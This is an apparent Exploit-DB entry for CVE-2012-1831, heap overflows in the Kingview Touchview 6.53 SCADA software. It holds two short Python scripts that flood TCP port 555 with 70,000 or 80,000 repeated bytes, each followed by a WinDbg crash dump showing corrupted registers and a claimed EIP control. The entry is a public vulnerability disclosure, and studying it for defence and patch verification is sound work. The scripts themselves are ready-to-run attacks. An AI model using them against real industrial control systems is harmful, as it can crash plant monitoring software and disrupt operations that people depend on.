Kingview Touchview 6.53 - Multiple Heap Overflow Vulnerabilities

EDB-ID:

19389

CVE:

2012-1831

EDB Verified:

Author:

Carlos Mario Penagos Hollmann

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2012-06-25

Vulnerable App: 
# Exploit Title: Kingview 6.53 touchview.exe heap overflow 2
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com

# Version: 6.53
# Tested on: Windows SP 1
# CVE :

Open kingivew click on Make choose network configuration--->network
parameter , then  go to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.

import os
import socket
import sys

host ="10.0.2.15"
port = 555

exploit=("D"*70000)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host,port))
s2.send(exploit)
data = s2.recv(1024)
s2.close()

eax=42424242 ebx=00140000 ecx=0098ffff edx=00990000 esi=00140748
edi=00000004
eip=7c902a9d esp=0012f0b8 ebp=00140748 iopl=0         nv up ei pl nz na pe
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00010206
ntdll!tan+0xcf:
7c902a9d 8b18            mov     ebx,dword ptr [eax]  ds:0023:42424242=?????
c902a8d 55              push    ebp
7c902a8e 8be9            mov     ebp,ecx
7c902a90 8b5504          mov     edx,dword ptr [ebp+4]
7c902a93 8b4500          mov     eax,dword ptr [ebp]
7c902a96 0bc0            or      eax,eax
7c902a98 740c            je      ntdll!tan+0xd8 (7c902aa6)
7c902a9a 8d4aff          lea     ecx,[edx-1]
7c902a9d 8b18            mov     ebx,dword ptr [eax]
ds:0023:42424242=????????
7c902a9f f00fc74d00      lock cmpxchg8b qword ptr [ebp]
7c902aa4 75f0            jne     ntdll!tan+0xc8 (7c902a96)
7c902aa6 5d              pop     ebp
7c902aa7 5b              pop     ebx
7c902aa8 c3              ret
7c902aa9 8d4900          lea     ecx,[ecx]
7c902aac 8f0424          pop     dword ptr [esp]
7c902aaf 90              nop
7c902ab0 53              push    ebx
7c902ab1 55              push    ebp



###############################################################


# Exploit Title: Kingview Touchview EIP direct control
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com

# Version: 6.53
# Tested on: Windows SP 1
# CVE :

Open kingivew click on Make choose network configuration--->network
parameter , then go to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.


import os
import socket
import sys

host ="10.0.2.15"
port = 555

exploit=("B"*80000)




s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host,port))
s2.send(exploit)
data = s2.recv(1024)
s2.close()

7c91b1ea 8b4610 mov eax,dword ptr [esi+10h]
7c91b1ed 3bc3 cmp eax,ebx
7c91b1ef 8945fc mov dword ptr [ebp-4],eax
7c91b1f2 0f849e000000 je ntdll!RtlpUnWaitCriticalSection+0x2f
(7c91b296)
7c91b1f8 8b06 mov eax,dword ptr [esi]
7c91b1fa ff4010 inc dword ptr [eax+10h]
ds:0023:42424252=????????
7c91b1fd 8b45fc mov eax,dword ptr [ebp-4]
7c91b200 83e001 and eax,1
7c91b203 8945e8 mov dword ptr [ebp-18h],eax


ntdll!RtlpWaitForCriticalSection+0x5b
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services